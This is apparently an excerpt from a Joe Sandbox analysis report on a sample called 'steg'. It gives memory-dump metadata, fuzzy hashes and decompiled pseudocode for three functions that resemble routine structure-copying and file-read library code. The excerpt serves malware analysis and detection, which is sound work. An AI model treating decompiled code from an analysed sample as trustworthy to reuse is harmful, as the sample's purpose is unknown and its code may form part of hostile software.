                                                                                                                    0x00f90d2a
                                                                                                                    0x00f90d2f
                                                                                                                    0x00f90d32
                                                                                                                    0x00f90d32
                                                                                                                    0x00f90d69
                                                                                                                    0x00000000
                                                                                                                    0x00f90d6b
                                                                                                                    0x00f90d79
                                                                                                                    0x00f90d83
                                                                                                                    0x00f90d88
                                                                                                                    0x00f90d8e
                                                                                                                    0x00f90d92
                                                                                                                    0x00f90d9e
                                                                                                                    0x00f90da0
                                                                                                                    0x00f90da8
                                                                                                                    0x00f90db6
                                                                                                                    0x00f90dbb
                                                                                                                    0x00f90dbb
                                                                                                                    0x00f90da8
                                                                                                                    0x00f90d94
                                                                                                                    0x00f90d94
                                                                                                                    0x00f90d94
                                                                                                                    0x00f90dbe
                                                                                                                    0x00f90dc4
                                                                                                                    0x00000000
                                                                                                                    0x00f90dc4
                                                                                                                    0x00f90d8e
                                                                                                                    0x00f90cfb
                                                                                                                    0x00f90cfb
                                                                                                                    0x00000000
                                                                                                                    0x00f90cfb
                                                                                                                    0x00f90cf4
                                                                                                                    0x00f90cc5
                                                                                                                    0x00f90cd3
                                                                                                                    0x00f90cd8
                                                                                                                    0x00f90cdd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f90cdd
                                                                                                                    0x00000000
                                                                                                                    0x00f90dc5
                                                                                                                    0x00f90dd1
                                                                                                                    0x00f90dd6
                                                                                                                    0x00f90dd9
                                                                                                                    0x00f90ca7
                                                                                                                    0x00000000
                                                                                                                    0x00f90de1
                                                                                                                    0x00f90ded
                                                                                                                    0x00f90df2
                                                                                                                    0x00f90df8
                                                                                                                    0x00f90dfb
                                                                                                                    0x00f90e03
                                                                                                                    0x00f90e03
                                                                                                                    0x00f90e03
                                                                                                                    0x00f90c55
                                                                                                                    0x00000000
                                                                                                                    0x00f90bde
                                                                                                                    0x00f90bd7
                                                                                                                    0x00f90bd7
                                                                                                                    0x00f90bd9
                                                                                                                    0x00000000
                                                                                                                    0x00f90bd9
                                                                                                                    0x00f90b76
                                                                                                                    0x00f90acd
                                                                                                                    0x00f90ada
                                                                                                                    0x00f90aef
                                                                                                                    0x00f90afb
                                                                                                                    0x00f90b00
                                                                                                                    0x00f90b05
                                                                                                                    0x00f90b4c
                                                                                                                    0x00000000
                                                                                                                    0x00f90b07
                                                                                                                    0x00f90b14
                                                                                                                    0x00f90b29
                                                                                                                    0x00f90b35
                                                                                                                    0x00f90b3a
                                                                                                                    0x00f90b3f
                                                                                                                    0x00f90b45
                                                                                                                    0x00f90b51
                                                                                                                    0x00f90b51
                                                                                                                    0x00000000
                                                                                                                    0x00f90b51
                                                                                                                    0x00f90b3f
                                                                                                                    0x00f90b05
                                                                                                                    0x00000000
                                                                                                                    0x00f90a31
                                                                                                                    0x00f90a31
                                                                                                                    0x00f90a33
                                                                                                                    0x00f90a43
                                                                                                                    0x00f90a57
                                                                                                                    0x00f90e04
                                                                                                                    0x00f90e07
                                                                                                                    0x00f90e0a
                                                                                                                    0x00f90e13
                                                                                                                    0x00f90a5d
                                                                                                                    0x00f90a66
                                                                                                                    0x00f90a71
                                                                                                                    0x00f90a79
                                                                                                                    0x00f90a7a
                                                                                                                    0x00f90a88
                                                                                                                    0x00f90a88
                                                                                                                    0x00f90a57

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .$\"G$`"G
                                                                                                                    • API String ID: 0-3175736270
                                                                                                                    • Opcode ID: ea5b6cb9b53e8957100dbd267d18ea25f6a4621cf534d638f75f67bcf4c0e316
                                                                                                                    • Instruction ID: bb740335d243e77525b87dacd43897e763edd1543bdb4349ed4a63d6eff30b6e
                                                                                                                    • Opcode Fuzzy Hash: ea5b6cb9b53e8957100dbd267d18ea25f6a4621cf534d638f75f67bcf4c0e316
                                                                                                                    • Instruction Fuzzy Hash: A9C1B672E01259ABEF20EBA4CC45ADEB3BDAF55310F1041E2E508E3151EE76DB88DB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FD1547 Relevance: 6.2, APIs: 4, Instructions: 221COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00FD1547(intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int* _v20;
				signed int _t78;
				signed int* _t80;
				signed int _t81;
				signed short _t84;
				signed short _t89;
				signed short _t94;
				signed short _t102;
				signed short _t109;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int* _t133;
				intOrPtr _t134;
				intOrPtr _t138;
				signed short* _t139;
				signed short _t140;
				signed short _t141;
				signed short _t142;
				signed short _t143;
				intOrPtr _t144;
				signed short* _t146;
				void* _t148;
				void* _t149;

				_t139 = _a8;
				if(_t139 != 0) {
					_t78 =  *_t139 & 0x0000ffff;
					if(_t78 <= 0) {
						_t132 = 0;
					} else {
						_t132 = (_t78 - 1) * 8 - _t78 - 1 << 3;
					}
					_t125 = _a4;
					_t4 = _t132 + 0x40; // 0x40
					_t80 = E00FBE727(_a4, _t4);
					_t133 = _t80;
					_t149 = _t148 + 8;
					_v20 = _t133;
					if(_t133 != 0) {
						_t81 =  *_t139 & 0x0000ffff;
						_t133[0] = _t81;
						 *_t133 = _t81;
						_v12 = 0;
						if(0 <  *_t139) {
							_t134 = _t133 - _t139;
							_t146 =  &(_t139[4]);
							_v8 = _t134;
							do {
								_t140 =  *_t146;
								if(_t140 != 0) {
									_t84 = _t140;
									if( *_t140 != 0) {
										do {
											_t84 = _t84 + 1;
										} while ( *_t84 != 0);
									}
									_v16 = (_t84 - _t140 & 0x3fffffff) + 1;
									_t127 = E00FBE727(_t125, (_t84 - _t140 & 0x3fffffff) + 1);
									_t149 = _t149 + 8;
									if(_t127 != 0) {
										E00FE7337(_t127, _t140, _v16);
										_t149 = _t149 + 0xc;
									}
									_t134 = _v8;
								} else {
									_t127 = 0;
								}
								 *((intOrPtr*)(_t134 + _t146)) = _t127;
								_t141 = _t146[2];
								if(_t141 != 0) {
									_t89 = _t141;
									if( *_t141 != 0) {
										do {
											_t89 = _t89 + 1;
										} while ( *_t89 != 0);
									}
									_v16 = (_t89 - _t141 & 0x3fffffff) + 1;
									_t128 = E00FBE727(_a4, (_t89 - _t141 & 0x3fffffff) + 1);
									_t149 = _t149 + 8;
									if(_t128 != 0) {
										E00FE7337(_t128, _t141, _v16);
										_t149 = _t149 + 0xc;
									}
									_t134 = _v8;
								} else {
									_t128 = 0;
								}
								 *((intOrPtr*)(_t134 +  &(_t146[2]))) = _t128;
								_t142 = _t146[4];
								if(_t142 != 0) {
									_t94 = _t142;
									if( *_t142 != 0) {
										do {
											_t94 = _t94 + 1;
										} while ( *_t94 != 0);
									}
									_v16 = (_t94 - _t142 & 0x3fffffff) + 1;
									_t129 = E00FBE727(_a4, (_t94 - _t142 & 0x3fffffff) + 1);
									_t149 = _t149 + 8;
									if(_t129 != 0) {
										E00FE7337(_t129, _t142, _v16);
										_t149 = _t149 + 0xc;
									}
									_t134 = _v8;
								} else {
									_t129 = 0;
								}
								 *((intOrPtr*)(_t134 +  &(_t146[4]))) = _t129;
								 *((char*)(_t134 +  &(_t146[0xa]))) = _t146[0xa] & 0x000000ff;
								 *(_t134 +  &(_t146[0xc])) = _t146[0xc];
								 *((char*)(_t134 +  &(_t146[0xa]))) = _t146[0xa] & 0x000000ff;
								_t143 = _t146[0x18];
								if(_t143 != 0) {
									_t102 = _t143;
									if( *_t143 != 0) {
										do {
											_t102 = _t102 + 1;
										} while ( *_t102 != 0);
									}
									_v16 = (_t102 - _t143 & 0x3fffffff) + 1;
									_t130 = E00FBE727(_a4, (_t102 - _t143 & 0x3fffffff) + 1);
									_t149 = _t149 + 8;
									if(_t130 != 0) {
										E00FE7337(_t130, _t143, _v16);
										_t149 = _t149 + 0xc;
									}
									_t134 = _v8;
								} else {
									_t130 = 0;
								}
								 *((intOrPtr*)(_t134 +  &(_t146[0x18]))) = _t130;
								 *((char*)(_t134 +  &(_t146[0xb]))) = _t146[0xb];
								 *(_t134 +  &(_t146[0x1a])) = _t146[0x1a];
								_t109 = _t146[6];
								 *(_t134 +  &(_t146[6])) = _t109;
								if(_t109 != 0) {
									 *((short*)(_t109 + 0x20)) =  *((short*)(_t109 + 0x20)) + 1;
								}
								_t125 = _a4;
								_t110 = E00FD0E17(_a4, _t146[8], _a12);
								_t144 = _v8;
								 *((intOrPtr*)(_t144 +  &(_t146[8]))) = _t110;
								 *((intOrPtr*)(_t144 +  &(_t146[0xe]))) = E00FA6677(_a4, _t146[0xe], _a12, 0);
								_t112 = E00FC6BA7(_a4, _t146[0x10]);
								_t134 = _t144;
								_t138 = _v12 + 1;
								 *((intOrPtr*)(_t134 +  &(_t146[0x10]))) = _t112;
								 *(_t134 +  &(_t146[0x14])) = _t146[0x14];
								 *(_t134 +  &(_t146[0x16])) = _t146[0x16];
								_t149 = _t149 + 0x24;
								_t146 =  &(_t146[0x1c]);
								_v12 = _t138;
							} while (_t138 <  *_a8);
							_t133 = _v20;
						}
						return _t133;
					} else {
						return _t80;
					}
				} else {
					return 0;
				}
			}


































                                                                                                                    0x00fd154e
                                                                                                                    0x00fd1553
                                                                                                                    0x00fd155c
                                                                                                                    0x00fd1562
                                                                                                                    0x00fd1574
                                                                                                                    0x00fd1564
                                                                                                                    0x00fd156f
                                                                                                                    0x00fd156f
                                                                                                                    0x00fd1577
                                                                                                                    0x00fd157a
                                                                                                                    0x00fd157f
                                                                                                                    0x00fd1584
                                                                                                                    0x00fd1586
                                                                                                                    0x00fd1589
                                                                                                                    0x00fd158e
                                                                                                                    0x00fd1596
                                                                                                                    0x00fd1599
                                                                                                                    0x00fd159d
                                                                                                                    0x00fd15a2
                                                                                                                    0x00fd15ac
                                                                                                                    0x00fd15b2
                                                                                                                    0x00fd15b5
                                                                                                                    0x00fd15b8
                                                                                                                    0x00fd15bb
                                                                                                                    0x00fd15bb
                                                                                                                    0x00fd15bf
                                                                                                                    0x00fd15c8
                                                                                                                    0x00fd15ca
                                                                                                                    0x00fd15cc
                                                                                                                    0x00fd15cc
                                                                                                                    0x00fd15cd
                                                                                                                    0x00fd15cc
                                                                                                                    0x00fd15dc
                                                                                                                    0x00fd15e4
                                                                                                                    0x00fd15e6
                                                                                                                    0x00fd15eb
                                                                                                                    0x00fd15f2
                                                                                                                    0x00fd15f7
                                                                                                                    0x00fd15f7
                                                                                                                    0x00fd15fa
                                                                                                                    0x00fd15c1
                                                                                                                    0x00fd15c1
                                                                                                                    0x00fd15c1
                                                                                                                    0x00fd15fd
                                                                                                                    0x00fd1600
                                                                                                                    0x00fd1605
                                                                                                                    0x00fd160e
                                                                                                                    0x00fd1610
                                                                                                                    0x00fd1617
                                                                                                                    0x00fd1617
                                                                                                                    0x00fd1618
                                                                                                                    0x00fd1617
                                                                                                                    0x00fd1629
                                                                                                                    0x00fd1631
                                                                                                                    0x00fd1633
                                                                                                                    0x00fd1638
                                                                                                                    0x00fd163f
                                                                                                                    0x00fd1644
                                                                                                                    0x00fd1644
                                                                                                                    0x00fd1647
                                                                                                                    0x00fd1607
                                                                                                                    0x00fd1607
                                                                                                                    0x00fd1607
                                                                                                                    0x00fd164a
                                                                                                                    0x00fd164e
                                                                                                                    0x00fd1653
                                                                                                                    0x00fd165c
                                                                                                                    0x00fd165e
                                                                                                                    0x00fd1667
                                                                                                                    0x00fd1667
                                                                                                                    0x00fd1668
                                                                                                                    0x00fd1667
                                                                                                                    0x00fd1679
                                                                                                                    0x00fd1681
                                                                                                                    0x00fd1683
                                                                                                                    0x00fd1688
                                                                                                                    0x00fd168f
                                                                                                                    0x00fd1694
                                                                                                                    0x00fd1694
                                                                                                                    0x00fd1697
                                                                                                                    0x00fd1655
                                                                                                                    0x00fd1655
                                                                                                                    0x00fd1655
                                                                                                                    0x00fd169a
                                                                                                                    0x00fd16a2
                                                                                                                    0x00fd16a9
                                                                                                                    0x00fd16b1
                                                                                                                    0x00fd16b5
                                                                                                                    0x00fd16ba
                                                                                                                    0x00fd16c3
                                                                                                                    0x00fd16c5
                                                                                                                    0x00fd16c7
                                                                                                                    0x00fd16c7
                                                                                                                    0x00fd16c8
                                                                                                                    0x00fd16c7
                                                                                                                    0x00fd16d9
                                                                                                                    0x00fd16e1
                                                                                                                    0x00fd16e3
                                                                                                                    0x00fd16e8
                                                                                                                    0x00fd16ef
                                                                                                                    0x00fd16f4
                                                                                                                    0x00fd16f4
                                                                                                                    0x00fd16f7
                                                                                                                    0x00fd16bc
                                                                                                                    0x00fd16bc
                                                                                                                    0x00fd16bc
                                                                                                                    0x00fd16fa
                                                                                                                    0x00fd1701
                                                                                                                    0x00fd1708
                                                                                                                    0x00fd170c
                                                                                                                    0x00fd170f
                                                                                                                    0x00fd1715
                                                                                                                    0x00fd1717
                                                                                                                    0x00fd1717
                                                                                                                    0x00fd171e
                                                                                                                    0x00fd1725
                                                                                                                    0x00fd172a
                                                                                                                    0x00fd1732
                                                                                                                    0x00fd173f
                                                                                                                    0x00fd1747
                                                                                                                    0x00fd174f
                                                                                                                    0x00fd1751
                                                                                                                    0x00fd1752
                                                                                                                    0x00fd1759
                                                                                                                    0x00fd1760
                                                                                                                    0x00fd1767
                                                                                                                    0x00fd176d
                                                                                                                    0x00fd1770
                                                                                                                    0x00fd1773
                                                                                                                    0x00fd177b
                                                                                                                    0x00fd177e
                                                                                                                    0x00fd1786
                                                                                                                    0x00fd1590
                                                                                                                    0x00fd1595
                                                                                                                    0x00fd1595
                                                                                                                    0x00fd1555
                                                                                                                    0x00fd155b
                                                                                                                    0x00fd155b

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a5cfa44bf03b20b72850cac4e78dce90d766afd3f216927f602a0fdccb3b748a
                                                                                                                    • Instruction ID: dd521ac5a8a0d2a73ee7f65b8f61649c5027bf1db772ff0527cab524e96ce0a8
                                                                                                                    • Opcode Fuzzy Hash: a5cfa44bf03b20b72850cac4e78dce90d766afd3f216927f602a0fdccb3b748a
                                                                                                                    • Instruction Fuzzy Hash: B171B276900741AFDB218F65CC40A6ABBB6FF49324F2C415EE89687701E736DA12EB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FA6677 Relevance: 6.2, APIs: 4, Instructions: 201COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E00FA6677(intOrPtr _a4, char _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				char _t72;
				signed int _t74;
				intOrPtr* _t95;
				intOrPtr _t100;
				void* _t105;
				signed int _t108;
				void* _t112;
				intOrPtr _t113;
				signed int _t121;
				char _t123;
				signed int _t126;
				char _t130;
				intOrPtr* _t132;
				char _t133;
				void* _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0) {
					return 0;
				} else {
					_t70 = _a12;
					_t132 = _a16;
					_t126 = _a12 & 0x00000001;
					_v12 = _t126;
					_v16 = 0;
					if(_t132 == 0) {
						_t72 = E00FBE727(_a4, E00FA5517(_t130, _t70));
						_t126 = _v12;
						_t136 = _t136 + 0x10;
						_t133 = _t72;
					} else {
						_t133 =  *_t132;
						_v16 = 0x8000;
					}
					_a8 = _t133;
					if(_t133 == 0) {
						L35:
						return _t133;
					} else {
						if(_t126 != 0) {
							if( *((intOrPtr*)(_t130 + 8)) != 0 ||  *((intOrPtr*)(_t130 + 0xc)) != 0 ||  *((intOrPtr*)(_t130 + 0x14)) != 0) {
								L11:
								_t74 = 0x2018;
							} else {
								_t74 = 0x4008;
								if( *((intOrPtr*)(_t130 + 0x10)) != 0) {
									goto L11;
								}
							}
						} else {
							_t74 = _t126 + 0x30;
						}
						_t108 =  *(_t130 + 2) & 0x0000ffff;
						_v8 = _t74;
						_t75 = _t74 & 0x00000fff;
						_v24 = _t74 & 0x00000fff;
						if((_t108 & 0x00000800) != 0) {
							L15:
							_v20 = 0;
						} else {
							_t124 =  *((intOrPtr*)(_t130 + 4));
							if( *((intOrPtr*)(_t130 + 4)) == 0) {
								goto L15;
							} else {
								_t105 = E00FD2267(_t124);
								_t136 = _t136 + 4;
								_v20 = _t105 + 1;
								_t75 = _v24;
							}
						}
						if(_t126 == 0) {
							if((_t108 & 0x00004000) == 0) {
								asm("sbb ebx, ebx");
								_t112 = ( ~(_t108 & 0x00002000) & 0xffffffe8) + 0x30;
							} else {
								_t112 = 8;
							}
							E00FE7337(_t133, _t130, _t112);
							E00FE7C87(_a8 + _t112, 0, 0x30 - _t112);
							_t137 = _t136 + 0x18;
						} else {
							E00FE7337(_t133, _t130, _t75);
							_t137 = _t136 + 0xc;
						}
						 *(_t133 + 2) = _v8 & 0x00006000 |  *(_t133 + 2) & 0x00001fff | _v16;
						_t120 = _v20;
						if(_v20 != 0) {
							 *((intOrPtr*)(_t133 + 4)) = _a8 + _v24;
							E00FE7337(_a8 + _v24,  *((intOrPtr*)(_t130 + 4)), _t120);
							_t137 = _t137 + 0xc;
						}
						_t121 =  *(_t130 + 2) & 0x0000ffff;
						_t113 = _a4;
						if(0 == (( *(_t133 + 2) | _t121) & 0x00004000)) {
							_push(_v12);
							_push( *((intOrPtr*)(_t130 + 0x10)));
							_push(_t113);
							if((_t121 & 0x00001000) == 0) {
								_t100 = E00FC3147();
							} else {
								_t100 = E00FD0E17();
							}
							 *((intOrPtr*)(_t133 + 0x10)) = _t100;
							_t137 = _t137 + 0xc;
						}
						if(( *(_t133 + 2) & 0x00006000) == 0) {
							 *((short*)(_t133 + 0x22)) = 0;
							if(( *(_t130 + 2) & 0x00004000) != 0) {
								goto L34;
							} else {
								 *((intOrPtr*)(_t133 + 8)) = E00FA6677(_t113,  *((intOrPtr*)(_t130 + 8)), 0, 0);
								 *((intOrPtr*)(_t133 + 0xc)) = E00FA6677(_t113,  *((intOrPtr*)(_t130 + 0xc)), 0, 0);
								return _t133;
							}
						} else {
							_t123 = _a8 + E00FA54A7(_t130, _a12);
							_a8 = _t123;
							if(( *(_t133 + 2) & 0x00002000) != 0) {
								 *((intOrPtr*)(_t133 + 8)) = E00FA6677(_t113,  *((intOrPtr*)(_t130 + 8)), 1,  &_a8);
								 *((intOrPtr*)(_t133 + 0xc)) = E00FA6677(_t113,  *((intOrPtr*)(_t130 + 0xc)), 1,  &_a8);
								_t123 = _a8;
							}
							_t95 = _a16;
							if(_t95 != 0) {
								 *_t95 = _t123;
							}
							L34:
							goto L35;
						}
					}
				}
			}
























                                                                                                                    0x00fa667e
                                                                                                                    0x00fa6683
                                                                                                                    0x00fa68a8
                                                                                                                    0x00fa6689
                                                                                                                    0x00fa6689
                                                                                                                    0x00fa668d
                                                                                                                    0x00fa6692
                                                                                                                    0x00fa6695
                                                                                                                    0x00fa6698
                                                                                                                    0x00fa66a1
                                                                                                                    0x00fa66b9
                                                                                                                    0x00fa66be
                                                                                                                    0x00fa66c1
                                                                                                                    0x00fa66c4
                                                                                                                    0x00fa66a3
                                                                                                                    0x00fa66a3
                                                                                                                    0x00fa66a5
                                                                                                                    0x00fa66a5
                                                                                                                    0x00fa66c6
                                                                                                                    0x00fa66cb
                                                                                                                    0x00fa685d
                                                                                                                    0x00fa6864
                                                                                                                    0x00fa66d1
                                                                                                                    0x00fa66d3
                                                                                                                    0x00fa66de
                                                                                                                    0x00fa66f7
                                                                                                                    0x00fa66f7
                                                                                                                    0x00fa66ec
                                                                                                                    0x00fa66f0
                                                                                                                    0x00fa66f5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fa66f5
                                                                                                                    0x00fa66d5
                                                                                                                    0x00fa66d5
                                                                                                                    0x00fa66d5
                                                                                                                    0x00fa66fd
                                                                                                                    0x00fa6701
                                                                                                                    0x00fa6704
                                                                                                                    0x00fa6709
                                                                                                                    0x00fa6712
                                                                                                                    0x00fa672d
                                                                                                                    0x00fa672d
                                                                                                                    0x00fa6714
                                                                                                                    0x00fa6714
                                                                                                                    0x00fa6719
                                                                                                                    0x00000000
                                                                                                                    0x00fa671b
                                                                                                                    0x00fa671c
                                                                                                                    0x00fa6721
                                                                                                                    0x00fa6725
                                                                                                                    0x00fa6728
                                                                                                                    0x00fa6728
                                                                                                                    0x00fa6719
                                                                                                                    0x00fa6736
                                                                                                                    0x00fa674b
                                                                                                                    0x00fa675c
                                                                                                                    0x00fa6761
                                                                                                                    0x00fa674d
                                                                                                                    0x00fa674d
                                                                                                                    0x00fa674d
                                                                                                                    0x00fa6767
                                                                                                                    0x00fa677c
                                                                                                                    0x00fa6781
                                                                                                                    0x00fa6738
                                                                                                                    0x00fa673b
                                                                                                                    0x00fa6740
                                                                                                                    0x00fa6740
                                                                                                                    0x00fa67a0
                                                                                                                    0x00fa67a4
                                                                                                                    0x00fa67a9
                                                                                                                    0x00fa67b2
                                                                                                                    0x00fa67b9
                                                                                                                    0x00fa67be
                                                                                                                    0x00fa67be
                                                                                                                    0x00fa67c1
                                                                                                                    0x00fa67c9
                                                                                                                    0x00fa67dc
                                                                                                                    0x00fa67de
                                                                                                                    0x00fa67e1
                                                                                                                    0x00fa67e4
                                                                                                                    0x00fa67eb
                                                                                                                    0x00fa67f4
                                                                                                                    0x00fa67ed
                                                                                                                    0x00fa67ed
                                                                                                                    0x00fa67ed
                                                                                                                    0x00fa67f9
                                                                                                                    0x00fa67fc
                                                                                                                    0x00fa67fc
                                                                                                                    0x00fa6808
                                                                                                                    0x00fa6867
                                                                                                                    0x00fa6874
                                                                                                                    0x00000000
                                                                                                                    0x00fa6876
                                                                                                                    0x00fa6887
                                                                                                                    0x00fa6896
                                                                                                                    0x00fa68a1
                                                                                                                    0x00fa68a1
                                                                                                                    0x00fa680a
                                                                                                                    0x00fa6816
                                                                                                                    0x00fa6820
                                                                                                                    0x00fa6827
                                                                                                                    0x00fa6838
                                                                                                                    0x00fa684a
                                                                                                                    0x00fa684d
                                                                                                                    0x00fa6850
                                                                                                                    0x00fa6853
                                                                                                                    0x00fa6858
                                                                                                                    0x00fa685a
                                                                                                                    0x00fa685a
                                                                                                                    0x00fa685c
                                                                                                                    0x00000000
                                                                                                                    0x00fa685c
                                                                                                                    0x00fa6808
                                                                                                                    0x00fa66cb

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1357608183-0
                                                                                                                    • Opcode ID: 8dad90dc06fccf1d0fce5a3f5a61b94d905bb9cd5d45d26637a828d7000bc66e
                                                                                                                    • Instruction ID: d913dff4771715ba6db7e71d19b2846aa92af509234a1a1a98a7c2887cd0f603
                                                                                                                    • Opcode Fuzzy Hash: 8dad90dc06fccf1d0fce5a3f5a61b94d905bb9cd5d45d26637a828d7000bc66e
                                                                                                                    • Instruction Fuzzy Hash: 0861C3F5900705ABEB20DF65CC41BAAB7B8FF05314F088129F919DB640E739D950EBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FE9500 Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 69%
                                                                                                                    			E00FE9500(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00FE7C87(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E00FEF3E8(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00FE7C87(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00FEC705())) = 0x22;
												L4:
												E00FEC696();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v8 = _t110 + 1;
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E00FEEF23(_t119));
											_t88 = E00FF0139();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00FEFFB2(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t120 = _t120 + 0x10;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00FEC705())) = 0x16;
				goto L4;
			}




























                                                                                                                    0x00fe950a
                                                                                                                    0x00fe950d
                                                                                                                    0x00fe9513
